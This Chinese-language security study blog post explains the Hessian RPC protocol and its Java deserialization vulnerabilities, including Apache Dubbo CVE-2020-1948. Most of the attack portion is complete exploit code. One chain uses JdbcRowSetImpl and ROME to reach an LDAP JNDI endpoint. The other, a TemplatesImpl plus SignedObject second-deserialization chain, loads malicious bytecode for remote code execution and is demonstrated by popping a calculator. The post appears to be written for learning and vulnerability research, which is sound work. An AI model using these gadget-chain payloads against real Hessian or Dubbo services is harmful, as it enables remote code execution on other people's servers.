RPC协议
RPC全称为Remote Procedure Call Protocol(远程调用协议),RPC和之前学的RMI十分类似,都是远程调用服务,它们不同之处就是RPC是通过标准的二进制格式来定义请求的信息,这样跨平台和系统就更加方便
RPC协议的一次远程通信过程如下:
- 客户端发起请求,并按照RPC协议格式填充信息
- 填充完毕后将二进制格式文件转化为流,通过传输协议进行传输
- 服务端接收到流后,将其转换为二进制格式文件,并按照RPC协议格式获取请求的信息并进行处理
- 处理完毕后将结果按照RPC协议格式写入二进制格式文件中并返回
Hessian协议
Hessian是一个基于RPC的高性能二进制远程传输协议,官方对Java、Python、C++......语言都进行了实现,Hessian一般在Web服务中使用,在Java里它的使用方法很简单,它定义远程对象,并通过二进制的格式进行传输。
Hessian的简单使用
环境依赖
<dependency> <groupId>com.caucho</groupId> <artifactId>hessian</artifactId> <version>4.0.63</version> </dependency> Demo
package org.example; import java.io.Serializable; public class Person implements Serializable { public String name; public int age; public int getAge() { return age; } public String getName() { return name; } public void setAge(int age) { this.age = age; } public void setName(String name) { this.name = name; } } package org.example; import com.caucho.hessian.io.HessianInput; import com.caucho.hessian.io.HessianOutput; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; public class Hessian_test { public static <T> byte[] serialize(T o) throws IOException { ByteArrayOutputStream bao = new ByteArrayOutputStream(); HessianOutput output = new HessianOutput(bao); output.writeObject(o); System.out.println(bao.toString()); return bao.toByteArray(); } public static <T> T deserialize(byte[] bytes) throws IOException { ByteArrayInputStream bis = new ByteArrayInputStream(bytes); HessianInput input = new HessianInput(bis); Object o = input.readObject(); return (T) o; } public static void main(String[] args) throws IOException { Person person = new Person(); person.setName("F12"); person.setAge(20); byte[] s = serialize(person); System.out.println((Person) deserialize(s)); } } 感觉就是ObjectStream的一个替换,跟原生的并没有太大差异
Hessian反序列化漏洞
package org.example; import com.caucho.hessian.io.HessianInput; import com.caucho.hessian.io.HessianOutput; import com.sun.rowset.JdbcRowSetImpl; import com.sun.syndication.feed.impl.EqualsBean; import com.sun.syndication.feed.impl.ToStringBean; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.Serializable; import java.lang.reflect.Array; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.util.HashMap; public class Hessian_JNDI implements Serializable { public static <T> byte[] serialize(T o) throws IOException { ByteArrayOutputStream bao = new ByteArrayOutputStream(); HessianOutput output = new HessianOutput(bao); output.writeObject(o); System.out.println(bao.toString()); return bao.toByteArray(); } public static <T> T deserialize(byte[] bytes) throws IOException { ByteArrayInputStream bai = new ByteArrayInputStream(bytes); HessianInput input = new HessianInput(bai); Object o = input.readObject(); return (T) o; } public static void setValue(Object obj, String name, Object value) throws Exception{ Field field = obj.getClass().getDeclaredField(name); field.setAccessible(true); field.set(obj, value); } public static Object getValue(Object obj, String name) throws Exception{ Field field = obj.getClass().getDeclaredField(name); field.setAccessible(true); return field.get(obj); } public static void main(String[] args) throws Exception { JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); String url = "ldap://localhost:1099/EXP"; jdbcRowSet.setDataSourceName(url); ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class,jdbcRowSet); EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean); //手动生成HashMap,防止提前调用hashcode() HashMap hashMap = makeMap(equalsBean,"1"); byte[] s = serialize(hashMap); System.out.println(s); System.out.println((HashMap)deserialize(s)); } public static HashMap<Object, Object> makeMap ( Object v1, Object v2 ) throws Exception { HashMap<Object, Object> s = new HashMap<>(); setValue(s, "size", 2); Class<?> nodeC; try { nodeC = Class.forName("java.util.HashMap$Node"); } catch ( ClassNotFoundException e ) { nodeC = Class.forName("java.util.HashMap$Entry"); } Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); nodeCons.setAccessible(true); Object tbl = Array.newInstance(nodeC, 2); Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); setValue(s, "table", tbl); return s; } } 搭个ldap恶意服务,运行代码成功弹出计算器,分析一下流程,readObject处打个断点,在readObject中计算tag的值进行一个Switch,我们这里计算出来是77也就是M
跟进readMap
获取到一个空的Deserializer对象,直接跟进readMap
这里创建了一个Map对象,将我们的恶意序列化数据put进去,这里调用了2次readObject,因此我们会重复几次也会弹好几个计算器,重复过程结束后回到put方法,进入put触发的就是常规rome链,似乎非常的easy
Apache Dubbo Hessian反序列化漏洞(CVE-2020-1948)
环境搭建
直接偷大佬搭好的:https://github.com/Claradoll/Security_Learning
启动Dubbo之前得准备一些东西,需要安装Dubbo,选用Zookeeper作为注册中心(Registry),Apache Dubbo框架的流程如下
- 首先服务容器加载并运行Provider
- Provider在启动时向注册中心Registry注册自己提供的服务
- Consumer在Registry处订阅Provider提供的服务
- 注册中心返回服务地址给Consumer
- Consumer根据Registry提供的服务地址调用Provider提供的服务
- Consumer和Provider定时向监控中心Monitor发送一些统计数据
https://dlcdn.apache.org/zookeeper/zookeeper-3.8.4/
下载好后配置一下conf文件夹里的zoo.cfg文件,一开始不叫这个名字,改一下,添加这两个东西,data和log目录自己创建
dataDir=D:EnvironmentJavaapache-zookeeper-3.8.4-bindata dataLogDir=D:EnvironmentJavaapache-zookeeper-3.8.4-binlog 先启动zookeeper,bin目录下启动zkServer.cmd,然后IDEA里分别启动provider和consumer,访问这样就搭建成功了,consumer相当于客户端,provider就是服务端
反序列化漏洞分析
同样是JNDI注入触发rome链,攻击逻辑里面已经写好了,我们访问calc路由即可弹出计算器
这里分析一下Dubbo是怎么处理的,在服务端打个断点
再给DecodeableRpcInvocation的decode方法打个断点,方便调试
打完断点访问calc路由,进入decode方法
这一段代码获取了远程接口对象的路径和类型,以及dubbo的版本等等信息,但是在最后进行了反序列化,并且这里的in输入流是Hessian2对象
之后就是Hessian反序列化的流程了,为什么别的博主到这里tag变成了72,而我还是77,又一谜题,77常规的Hessian反序列化,就不往下分析了,可以去看看72的分析过程,不过大差不差
Hessian二次反序列化利用链
TemplatesImpl+SignedObject二次反序列化
上面确实有个疑惑是为什么要用JNDI,而不是单纯的TemplatesImpl链,在这里得到了解答,这是由于Hessian反序列化和Java原生反序列化的区别,如果用TemplatesImpl打的话,运行会报错
这是因为Tempaltes的_tfactory被transient修饰符修饰了,不可进行反序列化
那为什么原生的Java反序列化不会受到这个限制呢。这是因为原生反序列化过程中,假如类的readObject重写了,那就会调用它重写的逻辑,因此看看Templates类的readObject方法:
这里手动new了一个TransformerFactoryImpl实例,这样就不会遇到那种问题了
那既然如此,我们该如何绕过这个限制呢?思路其实很清晰,就是找一个类,那个类里有原生的readObject,这样就可以通过它触发二次反序列化,得以RCE,这个类也有一些要求,那就是要接上我们之前的Rome链子,在调用任意get和set那里接上,那么就要求目标类的get或者set方法中有readObject方法,刚好上篇讲的二次反序列化,这里就能够用到
package com.example.dubboconsumer.consumer; import com.alibaba.com.caucho.hessian.io.Hessian2Input; import com.alibaba.com.caucho.hessian.io.Hessian2Output; import com.rometools.rome.feed.impl.EqualsBean; import com.rometools.rome.feed.impl.ToStringBean; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import javax.management.BadAttributeValueExpException; import javax.xml.transform.Templates; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.lang.reflect.Array; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.security.*; import java.util.HashMap; public class Hessian_TemplatesImpl { public static void main(String[] args) throws Exception { TemplatesImpl templatesimpl = new TemplatesImpl(); byte[] bytecodes = Files.readAllBytes(Paths.get("D:\Java安全学习\evilref.class")); setValue(templatesimpl,"_name","aaa"); setValue(templatesimpl,"_bytecodes",new byte[][] {bytecodes}); setValue(templatesimpl, "_tfactory", new TransformerFactoryImpl()); ToStringBean toStringBean = new ToStringBean(Templates.class,templatesimpl); BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(123); setValue(badAttributeValueExpException,"val",toStringBean); KeyPairGenerator keyPairGenerator; keyPairGenerator = KeyPairGenerator.getInstance("DSA"); keyPairGenerator.initialize(1024); KeyPair keyPair = keyPairGenerator.genKeyPair(); PrivateKey privateKey = keyPair.getPrivate(); Signature signingEngine = Signature.getInstance("DSA"); SignedObject signedObject = new SignedObject(badAttributeValueExpException,privateKey,signingEngine); ToStringBean toStringBean1 = new ToStringBean(SignedObject.class, signedObject); EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean1); HashMap hashMap = makeMap(equalsBean, equalsBean); byte[] payload = Hessian2_Serial(hashMap); Hessian2_Deserial(payload); } public static byte[] Hessian2_Serial(Object o) throws IOException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); Hessian2Output hessian2Output = new Hessian2Output(baos); hessian2Output.writeObject(o); hessian2Output.flushBuffer(); return baos.toByteArray(); } public static Object Hessian2_Deserial(byte[] bytes) throws IOException { ByteArrayInputStream bais = new ByteArrayInputStream(bytes); Hessian2Input hessian2Input = new Hessian2Input(bais); Object o = hessian2Input.readObject(); return o; } public static HashMap<Object, Object> makeMap (Object v1, Object v2 ) throws Exception { HashMap<Object, Object> s = new HashMap<>(); setValue(s, "size", 2); Class<?> nodeC; try { nodeC = Class.forName("java.util.HashMap$Node"); } catch ( ClassNotFoundException e ) { nodeC = Class.forName("java.util.HashMap$Entry"); } Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); nodeCons.setAccessible(true); Object tbl = Array.newInstance(nodeC, 2); Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); setValue(s, "table", tbl); return s; } public static void setValue(Object obj, String name, Object value) throws Exception{ Field field = obj.getClass().getDeclaredField(name); field.setAccessible(true); field.set(obj, value); } } 运行即可弹计算器
![洛谷 P11345 [KTSC 2023 R2] 基地简化 题解](http://www.itfaba.com/wp-content/themes/kemi/timthumb.php?src=http://www.itfaba.com/wp-content/themes/kemi/img/random/2.jpg&w=218&h=124&zc=1)
